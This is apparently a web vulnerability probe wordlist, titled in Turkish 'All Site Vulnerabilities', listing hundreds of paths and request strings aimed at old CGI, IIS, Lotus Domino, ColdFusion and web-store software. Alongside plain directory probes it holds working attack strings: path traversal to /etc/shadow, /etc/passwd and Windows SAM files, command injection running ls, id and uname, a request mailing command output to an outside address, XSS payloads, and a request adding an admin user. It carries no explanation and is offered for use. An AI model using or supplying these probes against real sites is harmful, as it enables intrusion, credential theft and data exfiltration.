Bütün Site Açıkları
/Admin_files/
/DMR/
/StoreDB/
/WebShop/
/WebTrend/
/Web_store/
/webEdition/
/webedition/
/access/
/cms/
/cmsx/
/cmsx/upload.php
/cms/fileadmin/
/cms/fileadmin/log.txt
/account/
/accounting/
/administrator/
/ConsoleHelp/
/console/
/app/
/apps/
/archive/
/wi/
/wi/bin/
/system/
/system/bin/
/system/bin/upload/
/system/bin/binbackoffice/
/backoffice/
/bin/
/asp/
/demo/
/demonstration/
/atc/
/backup/
/bak/
/opt/
/opt/setupt/
/beta/
/bin/
/buy/
/buynow/
/c/
/cart/
/ccard/
/counter/
/credit/
/customers/
/userdata/
/Search
/~Account%20Name/Search
/snmpinit
/dat/
/data/
/chat/data/
/chat/data/usr/
/database/
/db/
/dbase/
/doc-html/
/docs/
/down/
/download/
/downloads/
/aspSmartUpload/
/cmsupload/
/cmsuploads/
/cms-uploads/
/cms-up/
/cmsup/
/img_upl/
/img_upload/
/images_upload/
/images_upl/
/upload-docs/
/upload-documents/
/upload-files/
/uploadfiles/
/uploadtemp/
/upload-temp/
/uploadtmp/
/upload-tmp/
/admin/dateiupload.php
/admin/dateiverwaltung.php
/dateiverwaltung.php
/dateiupload.php
/tmpupload/
/tempupload/
/tmp-upload/
/temp-upload/
/upload2.htm
/upload2.html
/upload/
/uploads/
/upload/
/uploading/
/employees/
/wartung/
/support/
/exe/
/file/
/files/
/forum/
/fpadmin/
/ftp/
/ftpfiles/
/guestbook/
/guests/
/home/
/htdocs/
/html/
/ibill/
/idea/
/ideas/
/incoming/
/info/
/install/
/installfiles/
/install-files/
/intranet/
/intra/
/jave/
/jdbc/
/lib/
/library/
/login/
/log/
/logfiles/
/mail/
/mall_log_files/
/manual/
/marketing/
/msql/
/new/
/newfiles/
/old/
/oldfiles/
/odbc/
/old/
/oracle/
/postgres/
/postgresql/
/order/
/orders/
/outgoing/
/pages/
/password/
/passwords/
/perl/
/private/
/pub/
/public/
/purchase/
/purchases/
/pw/
/register/
/registered/
/reseller/
/retail/
/root/
/sales/
/setup-files/
/setup_files/
/setup/
/shop/
/shopper/
/site/iissamples/
/software/
/source/
/src/
/srcfiles/
/sql/
/support/
/tmp/
/tmpfiles/
/temp/
/tempfiles/
/test/
/testfiles/
/tst/
/tstfiles/
/tstsite/
/testsite/
/test-cgi/
/tools/
/tree/
/updates/
/usage/
/user/
/users/
/web/
/web800fo/
/webadmin/
/board/docs/
/webboard/
/webdata/
/website/
/www/
/www-sql/
/wwwjoin/
/import/
/zipfiles/
/zip/
/zips/
/session/
/session.jsp
/session.jhtml
/session.php
/session.phps
/session.asp
/session.aspx
/session.pl
/cgi-bin/session.pl
/cgi-bin/xxxnonexistingyy.pl
/cgi-bin/xxxnonexistingyy.exe
/cgi-bin/xxxnonexistingyy.bat
/cgi-bin/xxxnonexistingyy.jsp
/session.py
/sessions
/sessions.jsp
/sessions.jhtml
/sessions.php
/sessions.phps
/sessions.asp
/sessions.aspx
/sessions.pl
/cgi-bin/sessions.pl
/sessions.py
/cgi-bin/
/cgi-local/
/cgi-win/
/cgi-home/
/cgi/
/dyn/
/dynamic/
/sbin/
/include/
/includes/
/inc/
/java/
/config/
/admin/
/_admin/
/__admin/
/Admin/
/./admin/
/administration/
/Administration/
/info/
/stat/
/stats/
/status/
/express/cache/
/usage/
/private/
/priv/
/internal/
/priv/
/shtml/
/debug.txt
/debug.log
/dbg.txt
/dbg.log
/xsql/java/demo/
/../../shadow
/remote_login.pl%20
/WebSTAR%20LOG
/index.search
/.dS_store
/webstar.log
/logs/webstar.log
/pi_admin.admin
/test.php3
/info.php3
/ptsite/news.inc
/news.inc
/objcheck.asp
/scripts/objcheck.asp
/include/sql.php
/include/sql.inc
/include/db.inc
/include/news.inc
/include/database.inc
/include/data.inc
/include/functions.inc
/inc/sql.inc
/inc/sql.inc
/inc/db.inc
/inc/database.inc
/inc/data.inc
/inc/functions.inc
/inc/news.inc
/inc/test.php
/include/test.php
/extras/quicklist.php?bn=krasl
/cgi-bin/test.php3
/cgi-bin/web2mail.cgi
/cgi-bin/cgiemail/uargg.txt?0=0&1=1&2=2&256=256&array=array&a=a&i=i& c=c&arr=arr
/cgi-bin/web2mail.cgi
/random_banner/index.cgi?image_list=alternative_image.list&html_f ile=../../../../../etc/hosts
/random_banner/index.cgi?image_list=alternative_image.list&html_f ile=|ls%20-la|
/%3f.jsp
/example.jsp../
/example%2ejsp
/example.jsp..
/index.jsp..
/index.jsp::$DATA
/test.jsp..
/example.jsp%81
/index.JSP
/index.jsp../
/test.jsp../
/index%2ejsp
/test%2ejsp
/index.JHTML
/*.jhtml/
/*.jsp/
/*.jsp::$DATA/
/servlet//..//../o.jsp
/wl_management_internal2/
/wl_management_internal2/wl_management
/servlet/wl_management
/servlets/wl_management
/wl_management?x=y
/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
/a.jsp//..//..//..//..//..//../winnt/win.ini
/ConsoleHelp/
/*.shtml/
/*.shtml/login.jsp
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html =
/cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&orde r=2&searchkey=&search_fldnum=0&page=99999&html=
/cgi-bin/userreg.cgi?cmd=insert〈=eng&tnum=3&fld1=test99 9%0als
/..\\..\\..\\winnt\\repair\\sam._
:80/../../../autoexec.bat
/......autoexec.bat
/.html/............/autoexec.bat
/../../../../../../../boot.ini
/....../
/..../
/.../
/\\.../
/iisadmpwd/
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/iisadmpwd/_AuthChangeUrl
/_AuthChangeUrl
/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/iissamples/sdk/asp/docs/CodeBrws.asp
/iissamples/sdk/asp/interaction/ServerVariables_JScript.asp
/iissamples/sdk/asp/interaction/ServerVariables_VBScript.asp
/iissamples/
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_fileinfo
/scripts/iisadmin/ism.dll%3fhttp/dir
/iisadmin/ism.dll%3fhttp/dir
/cgi-bin/htimage.exe
/_vti_bin/fpcount.exe
/_vti_bin/_vti_aut/fp30reg.dll
/global.asax
/global.asax.cs
/global.asa
/global.asa::$DATA
/global.asa+.htr
/global.asa%3f.htr
/global.asa%3f.jsp
/global.asa\\
/global.asa%20.pl
/default.asp+.htr
/default.asp%3f.htr
/main.asp+.htr
/_vti_bin/shtml.dll/tstt.htm
/_vti_inf.html
/_vti_log/author.log
/_vti_pvt
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_private/form_results.txt
/AdSamples/config/site.csc
/siteserver/publishing/viewcode.asp?source=/tata.asp
/SiteServer/admin/findvserver.asp?uid=LDAP_Anonymous&pwd=LdapPasswor d_1
/SiteServer/Admin/commerce/foundation/domain.asp
/SiteServer/Admin/commerce/foundation/driver.asp
/SiteServer/Admin/commerce/foundation/DSN.asp
/Admin/knowledge/dsmgr/users/GroupManager.asp
/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
/SiteServer/Admin/knowledge/dsmgr/default.asp
/_mem_bin/auoconfig.asp
/_mem_bin/remind.asp
/scripts/cphost.dll?my_file=localthing&TargetURL=/Sites/Publishing/srvname/ldap_anonymous/
/scripts/cpshost.dll?my_file=localthing&TargetURL=/Sites/Publishing/srvname/ldap_anonymous/
/secret/index.html
/secret/index.htm
/cgi-bin/phf
/cgi-bin/commander.pl
/cgi-bin/Count.cgi
/cgi-bin/test.pl
/php/index.php
/cgi-bin/printenv
/cgi-bin/test.cgi
/cgi-bin/test-cgi
/cgi-bin/test- cgi.bat
/cgi-bin/nph-test-cgi
/cgi-bin/php.cgi
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/pfdisplay
/cgi-bin/perl.exe
/cgi-bin/perl
/perl
/perl/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/scripts/perl.exe
/scripts/perl
/cgi-bin/perl
/scripts/*.pl
/cgi-bin/gbadmin.cgi?action=setup
/guestbook/gbadmin.cgi?action=setup
/gbook/gbadmin.cgi?action=setup
/guest/gbadmin.cgi?action=setup
/cgi-bin/guestbook/passwd
/cgi-bin/guestbook/passwd.txt
/cgi-bin/guestbook/passwd.dat
/cgi-bin/guestbook/passwd.db
/guestbook/passwd
/guestbook/passwd.txt
/guestbook/passwd.dat
/guestbook/passwd.db
/wwwboard/passwd.txt
/files/passwd
/files/passwd.txt
/files/passwd.dat
/files/passwd.db
/files/pwd
/files/pwd.txt
/files/pwd.dat
/files/pwd.db
/wwwboard/wwwboard.pl
/cgi-bin/wwwboard.pl
/wwwboard/wwwadmin.pl
/cgi-bin/wwwadmin.pl
/wwwboard/wwwadmin.cgi
/cgi-bin/wwwadmin.cgi
/cgi-bin/jj
/cgi-bin/fi
/cgi-bin/finger
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename= 99.10.28.15.23.username.|/bin/ls|
/cgi-bin/wais.pl
/cgi-bin/edit.pl
/cgi-bin/textcounter.pl
/cgi-bin/info2www
/cgi-bin/cachemgr.cgi
/cgi-bin/wguest.exe
/scripts/wguest.exe
/cgi-bin/rguest.exe
/scripts/rguest.exe
/cgi-bin/test.exe
/scripts/test.exe
/cgi-bin/test.bat
/scripts/test.bat
/cgi-bin/www-sql
/cgi-bin/search.cgi%3fletter=
/cgi-bin/search.asp
/scripts/search.asp
/search.asp
/cgi-bin/campas
/cgi-bin/view-source
/source?v=../../../../../../../etc/hosts%00
/cgi-bin/webgais
/cgi-bin/aglimpse
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/AnyForm2
/cgi-bin/infogate
/s97is.vts?action=View&VdkVgwKey=%2Fetc%2fhosts&doc type=raw&Collection=
/search97/s97_cgi.exe
/search/s97_cgi.exe
/search97/search97.vts
/search/search97.vts?HLNavigate=On&querytext=dcm&ServerKey =Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection =books
/search/s97.vts?Action=FormGen&ServerKey=Primary&Template=
/cgi-bin/dumpenv.pl
/session/adminlogin?RCpage=/sysadmin/index.stm
/cgi-bin
/cgi-shl
/scripts
/scripts/bdir.htr
/scripts/convert.bas
/scripts/files.pl
/cgi-bin/files.pl
/webadmin.ntf
/homepage.nsf
/webadmin.nsf
/statref.nsf
/setup.nsf
/setupweb.nsf
/domcfg.nsf/%3fopen
/domcfg.nsf/URLRedirect/%3fOpenForm
/domcfg.nsf/viewname%3fSearchView&Query=\"*\"
/log.nsf
/domlog.nsf
/names.nsf
/catalog.nsf
/database.nsf?EditDocument
/names.nsf/Open
/events4.nsf
/webadmin.nsf
/decsadm.nsf
/admin4.ntf
/admin4.nsf
/mailbox.ntf
/mailbox.nsf
/agentrunner.ntf
/agentrunner.nsf
/mailw46.nsf
/mailw46.ntf
/collect4.nsf
/collect4.ntf
/cersvr.nsf
/events4.nsf
/mab.nsf
/ntsync4.nsf
/ntsync4.ntf
/user_settings.cfg
/cgi-bin/unlg1.1
/cgi-bin/man.sh
/cgi-bin/AT-admin.cgi
/cgi-bin/filemail.pl
/cgi-bin/mailform.pl
/cgi-bin/mailto.cgi
/cgi-bin/mailform.cgi
/cgi-bin/maillist.pl
/cgi-bin/formto.pl
/cgi-bin/bnbform.cgi
/cgi-bin/bnbform.pl
/cgi-bin/bnbform
/cgi-bin/survey.cgi
/htbin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls|
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/environ.pl
/cgi-bin/env.pl
/cgi/env.pl
/cgi-dos/args.bat
/cgi-bin/carbo.dll
/cgi-bin/fpexplore.exe
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/CFDOCS/exampleapps/
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm?Tagname=
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/snippets/setlocale.cfm
/cgi-bin/whois_raw.cgi
/mall_log_files/order.log
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/pw/storemgr.pw
/quikstore.cfg
/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts
/shopper.exe?display=action&template= order.log
/orders/mountain.cfg
/orders/orders.txt
/Admin_files/order.log
/merchants/admin.pw
/store/index.php?cat_id=\'
/store/tmp/
/store/temp/
/store/customers/
/store/temp_customers/
/cgi-bin/query%3f
:9000/cgi-bin/query%3f
/cgi-bin/admin.cgi
/cgi-bin/admin.pl
/cgi-bin/admin.exe
/samples/view- source?filename=anotherone
:8080/samples/view- source?filename=anotherone
:8888/samples/view- source?filename=anotherone
:8888/admin.cgi
/cgi-bin/ppdscgi.exe
/ppwb/Temp/
:2082/login/?user=_cmd_with_pipes_and_backticks
:4274/../../../../../WINNT/repair/sam
/login/?user=_cmd_with_pipes_and_backticks
:4080/?KerioFW
:9495/
:1984
:7273/?dellopenmanage
:8009/
:8010/c://
:8010/d://
:8010//
:8010/..../
:8010/
:8081/
:8080/\\../readme.txt
:5000/
:2301
:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2F bo ot.ini
:3128/../../../../
:9090
:901
:8383
:8383/1111/readmail.cgi?uid=user1&mbx=../test/Main
:800/../..\\
:800/C:/
:7464/
:12000
:9090///
:2301/Proxy/LoginResponse
:8888/surf/scwebusers
:8888/SimpleBar.dll/RunReport
:9090/apps/web/vs_diag.cgi?server=_XSS_
:6680/user.cgi?cmd=xssthings&utoken=
:8089/tools/ftgatedump.fts
:8089/tools/ftgatedump.fts?command=1
:8000/admin/reports/alertlist.mml
:80/admin/reports/alertlist.mml
:8025/admin/reports/alertlist.mml
:8081/admin/reports/alertlist.mml
:8081/admin/reports/alertlist.mml
:8081/admin/reports/alertlist.mml
:9000/admin/reports/alertlist.mml
:8888/admin/reports/alertlist.mml
:85/waadmin.wa
10000:/dansguardian/edit.cgi?file=xxx
/waadmin.wa
:81/cgi-bin/.cobalt/message/message.cgi?info=**********alert%28\'XSS\'%29% 3B</script>
/cgi-bin/.cobalt/message/message.cgi?info=**********alert%28\'XSS\'%29% 3B</script>
8443:/plugins/hpjwja/script/devices_update_printer_fw_upload.hts
/plugins/hpjwja/script/devices_update_printer_fw_upload.hts
8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
/frontend/x/cpanelpro/ignorelist.html?account=\">**********alert(\'Vulnera ble\')</script>
/frontend/x/cpanelpro/showlog.html?account=**********alert(\'Vulnerable\') </script>
/frontend/x/sql/repairdb.html?db=**********alert(\'Vulnerable\')</script>
/frontend/x/ftp/doaddftp.html?login=\">**********alert(\'Vulnerable\' )</script>
/tools/ftgatedump.fts
/tools/ftgatedump.fts?command=1
/adsamples/config/site.csc
/iissamples/exair/HowItWorks/CodeBrws.asp
/samples/Search/queryhit.htm
/iissamples/sdk/asp/docs/codebrws.asp
/AdvWorks/equipment/catalog_type.asp
/scripts/repost.asp
/scripts/upload.asp
/scripts/uploadx.asp
/cgi-bin/upload_pdf.exe
/cgi-bin/upload_pic.exe
/cgi-bin/upload.exe
/scripts/upload.exe
/scripts/cgi-bin/upload.exe
/scripts/uploadn.asp
/SPSamp/AdvWorks/equipment/catalog_type.asp
/cgi-bin/rwwwshell.pl
/~/
/~root/
/~admin/
/~nobOdy/
/~www/
/~wwwrun/
/~bin/
/~guest/
/~log/
/~logs/
/~lp/
/~named/
/~test/
/~tmp/
/cgi-bin/imagemap.exe
/../../../../config.sys
/../webserver.ini
/cgi-bin/foo.cmd?xxx&dir
/scripts/foo.cmd?xxx&dir
/cgi-dos/foo.cmd?xxx&dir
/cgi-bin/script.bat%3f&dir
/scripts/script.cmd%3f&dir
/scripts/script.bat%3f&dir
/cgi-bin/tst.bat
/cgi-bin/tst2.bat
/cgi-bin/test.bat
/cgi-bin/input.bat
/cgi-bin/input2.bat
/ssi/envout.bat
/cgi-bin/get32.exe
/cgi-bin/tst.bat
/cgi-bin/alibaba.pl
/cgi-bin/post32.exe
/cgi-bin/post16.exe
/cgi-bin/get16.exe
/cgi-bin/lsin.exe
/cgi-bin/lsindex2.bat
/cgi-bin/imapcern.exe
/cgi-bin/imapncsa.exe
/cgi-bin/aliredir.exe
/WEB-INF./web.xml
/WEB-INF/web.xml
/signon?admin=admin&maybe_tivoli
:8000//
:8000//welcome.jsp
:8080/../examples//WEB-INF/../../../../../
:8080/../../../conf/Eserv.ini
:3128/../../../conf/Eserv.ini
:801/../../../../../../../../etc/hosts
:8888/
:9998/
:8500/CFIDE/probe.cfm
:8080/web-console/ServerInfo.jsp%00
//admin//user.pl
:8080//admin//user.pl
/web-console/ServerInfo.jsp%00
:8080/web-console/
/web-console/
/cgi-bin/auto_ftp.pl
/auto_ftp.pl
/publisher/
/bigconf.cgi
/cgi-bin/bigconf.cgi
/scripts/bigconf.cgi
/cgi-bin/ftpdiag.cgi
/cgi-bin/formhandler.cgi
/cgi-bin/formhandler/formhandler.cgi
/cgi-bin/add_ftp.cgi
/cgi-bin/OrderForm.cgi
/cgi-bin/cgitest.exe
/cgi-bin/cgitest.htm
/cgi-bin/cgitest.pl
/cgi-bin/cgitest.sh
/cgi-bin/flexform.cgi
/ows-bin/owa/owa%5futil%2esignature
/ows-bin/owa/owa%5futil%2eshowsource
/ows-bin/perlidlc.bat?&dir
/ows-bin/*.bat?&dir
:8003/Display
/cgi-bin/whois.cgi
/minivend/catalog.cfg
/cgi-bin/simple
/cgi-bin/simple/config/menu
/cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg
/cgi-bin/simple/view_page.html?mv_arg=|/bin/ls|
/view_all_bug_page.php
/bugs/view_all_bug_page.php
/bugtrack/view_all_bug_page.php
/mantis/view_all_bug_page.php
/mantis/login_page.php?g_****_include_file=every_file
/bugs/login_page.php?g_****_include_file=every_file
/bug/login_page.php?g_****_include_file=every_file
/bugtrack/login_page.php?g_****_include_file=every_file
/search%3f
/suche%3f
/search/iaquery.exe%3f
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
/cgi-bin/webwho.pl
/cgi-bin/w3-msql/index.html
/cgi-bin/FormMail.cgi
/cgi-bin/formmail.cgi
/cgi-bin/formmail.asp
/cgi-bin/FormMail.pl
/cgi-bin/formmail.pl
/cgi-bin/chformmail.pl
/cgi-bin/formmailET.pl
/cgi-bin/download.cgi?s=path&c=txt&f=fn
/cgi-bin/download.pl?s=path&c=txt&f=fn
/msadc/msadcs.dll
/msadc/samples/adctest.asp
/msadc/samples/adctest.exe
/scripts/tools/getdrvrs.exe
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B %28*.mdb%29&dsn=Web%20SQL&dbq=c:\\web.mdb&newdb=CRE ATE_DB&attr=
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/cgi-bin/forum.pl
/cgi-bin/forum-admin.pl
/cgi-bin/sendmail.cgi
/cgi-bin/guestadd.pl
/cgi-bin/plusmail
/manage/cgi/cgiproc?Nocfile=
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=&CiRestriction=none&CiH iliteType=Full
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/iishelp/iis/misc/iirturnh.htw
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/wwwthreads/changedisplay.pl
/scripts/wsisa.dll/WService=anything?WSMadmin
/WS_FTP.LOG
/log/WS_FTP.LOG
/logs/WS_FTP.LOG
/cgi-bin/Ultimate.cgi
/cgi-bin/dcboard.cgi
/cgi-bin/forums/dcboard.cgi
/cgi-bin/dcforum/dcboard.cgi
/cgi-bin/forumdisplay.cgi
/ubb/cgi-bin/postings.cgi
/ubb/register.php
/cgi-bin/postings.cgi
/cgi-bin/core
/.HTACCESS.
/%2esharelock
/%2eHTACCESS
/%2ehtaccess
/%2ehtpasswd
/cgi-bin/echo
/cgi-bin/echo2
/cgi-bin/echo.bat
/cgi-bin/hello.bat
/cgi-bin/htsearch.cgi?exclude=%60%60
/cgi-bin/htsearch?exclude=%60%60
/cgibin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/loadpage.cgi
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
/cgi-bin/rmp_query
/cgi-bin/postcard.pl
/cgi-bin/.fhp
/cgi-bin/clickresponder.pl
/cgi-bin/responder.cgi
/cgi-win/uploader.exe
/upload/uploader.php
/upload/upload.php
/uploader.php
/upload.php
/cgi-bin/uploadn.asp
/cgi-bin/upload.asp
/cgi-bin/excite
/cgi-bin/sojourn.cgi?cat=ng%00
/cgi-bin/abuse.man?file=&domain=&script=
/ping
/jsp/source.jsp
/jsp/upload.jsp
/cgi-bin/dfire.cgi
/cd/../config/html/cnf_gi.htm
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts
/ccbill/
/ccbill/whereami.cgi?g=cat+../../../../etc/hosts
/cgi-bin/windmail.exe?-n%20c:\\boot.ini%20swoopme@@hotmail.com
/cgi-bin/windmail.exe?%20|%20dir%20c:\\
/cgi-bin/dcforum/install_help.cgi
/cgi-bin/dcforum/dcforum.cgi?az=list&file=filename%00
/cgi-bin/dcforum.cgi?az=list&file=filename%00
/doc/
/scripts/slxweb.dll/admin
/cgi-bin/getdoc.cgi
/cgi-bin/webplus?script=
/cgi-bin/scripts/cart.pl
/cgi-bin/scripts/cart.pl?vars
/cgi-bin/scripts/cart.pl?env
/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20swoopme@@hotmail.com|&f6 =^a.*&action=searchdbdisplay
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_aut/mtd2lv.dll
/piranha/secure/passwd.php3?username=piranha&passwd=q
/cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Des cend&Page=0&Session=
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Des cend&Page=0&Session=
/scripts/cart32.exe/cart32clientlist?passwd=wemilo
/scripts/c32web.exe/ChangeAdminPassword
/cgi-bin/cart32.exe/expdate
/scripts/dbman/db.cgi?db=tedb
/scripts/process_bug.cgi
/cgi-bin/process_bug.cgi
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/scripts/emurl/RECMAN.dll?
/cgi-bin/allmanage.pl
/cgi-bin/allmanage.cgi
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/ads.cgi
/cgi-bin/admin.cgi
/ads/admin.cgi
/cgi-bin/adpassword.txt
/cgi-bin/ads/adpassword.txt
/cgi-bin/banner/adpassword.txt
/cgi-bin/banner/data/adpassword.txt
/password.inc
/password.txt
/password.db
/password.dat
/ads/adpassword.txt
/banner/adpassword.txt
/banner/dat/adpassword.txt
/banner/data/adpassword.txt
/webres/discuss/passwd.txt
/discuss/passwd.txt
/files/passwd.txt
/admin/admin.php
/guestbook/admin.php
/guestbook/files/passwd.txt
/gaestebuch/files/passwd.txt
/cgi-bin/infosrch.cgi
/scripts/Carello/add.exe
:8000/cgi/wja?page=wja
/robots.txt
/file/index.jsp
/file/main.jsp
/file/main.shtml
/file/index.shtml
/file/main.jhtml
/file/index.jhtml
/cgi-bin/showfile
/servlet/SessionServlet
/servlet/viewsource.jsp
/viewsource.jsp
/source.jsp
:8987/sawmill?rfcf+\"/etc/passwd\"+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi-bin/sawmill5?rfcf+\"/etc/passwd\"+spbn+1,1,21,1,1,1,1
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00
/cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00
/db/info.php
/poll/db/info.php
/poll/textfile/info.php
/PSUser/PSCOErrPage.htm?errPagePath=/etc/hosts
/site/eg/source.asp
/eg/source.asp
/cgi-bin/source.asp
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts
/cgi-bin/msn.cgi
/cgi-bin/disk2server.cgi
/cgi-bin/upload.cgi
/. color=#22229cwww.my.cnf
/globals.pl
/cgi-bin/. color=#22229cwww.my.cnf
/cgi-bin/futureforum.cgi
/cgi-bin/futureforum3.cgi
/forum/index.php?act=Search&nav=lv&CODE=show&searchid=val id_session_id&search_in=topics&result_type=topics& hl=&st=20_sql_things/*
/examples/applications/bboard/bboard_frames.html
/level/99/exec/show/config
/level/15/exec/show/config
/level/1/exec/show/config
/level/0/exec/show/config
/admin-serv/config/admpw
/https-admserv/config/admpw
/cgi-bin/cwmail.ini
/cgi-bin/cookmail
/cgi-bin/cookmail/cookmail
/cgi-bin/cookmail/cookmail.exe
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
/active.log
/cgi/cvsweb.cgi
/cgi-bin/cvsweb.cgi
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastn ame=LA&course_id=SID&password1=NEWPWD&password2=NE WPWD
/cgi-bin/ssi//../../../../../../../../../etc/hosts
/examples/servlet/SnoopServlet
/servlet/FileDistributionServlet
/servlets/weblogic.management.servlet.FileDistributionServle t
:2602
:8080/examples/servlet/SnoopServlet
:8080/examples/jsp/snp/anything.snp
:8080/anything.jsp
:8080/%2e%2e/%2e%2e/%00.jsp
/.%2e/.%2e/.%2e/winnt/repair/sam._
/anything.jsp
/examples/jsp/snp/anything.snp
/pservlet.html
/cgi-bin/mailto?MailTo=swoopme@hotmail.com&text=tst&EmailFo rm=/cgi-bin/mailto
/cgi-bin/mailfile?MailTo=swoopme@hotmail.com&FileName=mailf ile:c&Subject=tst&MailFrom=tst@no.net
/cgi-bin/mailfile.cgi?real_name=rc&email=swoopme@hotmail.co m&filename= mailfile.cgi
/cgi-bin/formprocessor.asp?MailTo=swoopme@hotmail.com&MailF rom=tst@no.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/cgi-bin/af.cgi?_browser_out=|/bin/ls|
/%00/
/admin/
:8080/tea/dynamic/system/teaservlet/Admin?admin=true
/servlet/file
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
/servlet/test/pathInfo/test
/..../
/~nobOdy/etc/
:3000/../../hosts
:444/..\\..\\..\\..\\..\\autoexec.bat
/pccsmysqladm/incs/dbconnect.inc
/include/dbconfig.inc
/dbconfig.inc
/config.inc
/cfg.inc
/include/config.inc
/inc/db.inc
/inc/odbc.inc
/db.inc
/dba.inc
/data.inc
/odbc.inc
/config.inc
/global.inc
/./../main.conf
:8888/ab2/@Ab2Admin
:8888/cgi-bin/admin/admin
:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=perceb e&re_password=percebe
/cgi-bin/netauth.cgi?cmd=show&page=../../
/admin.php?op=login&pwd=123&aid=Admin\'sqlthings
/admin.php3?admin=whatever
:9090/board.html
:9090/examples/applications/bboard/bboard_frames.html
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet
/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspSer vlet
/servlets/com.sun.server.http.pagecompile.jsp92.JspServlet
/servlets/com.sun.server.http.pagecompile.jsp.runtime.JspSer vlet
/cgibin/amadmin.pl?setpasswd
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\\..\\..\\..\\..\\..\\.. \\..\\..\\&fromfile=Boot.ini
/cgi-bin/news/news.cgi?addAuthor
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/CGImail.exe?%24Attach%24= file.txt&%24To%24=swoopme@hotmail.com
/.photon/voyager/config.full
/cgi-bin/cpmdaemon.cgi
:8088
/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
/phpPhotoAlbum/getalbum.php?album=../../../etc/
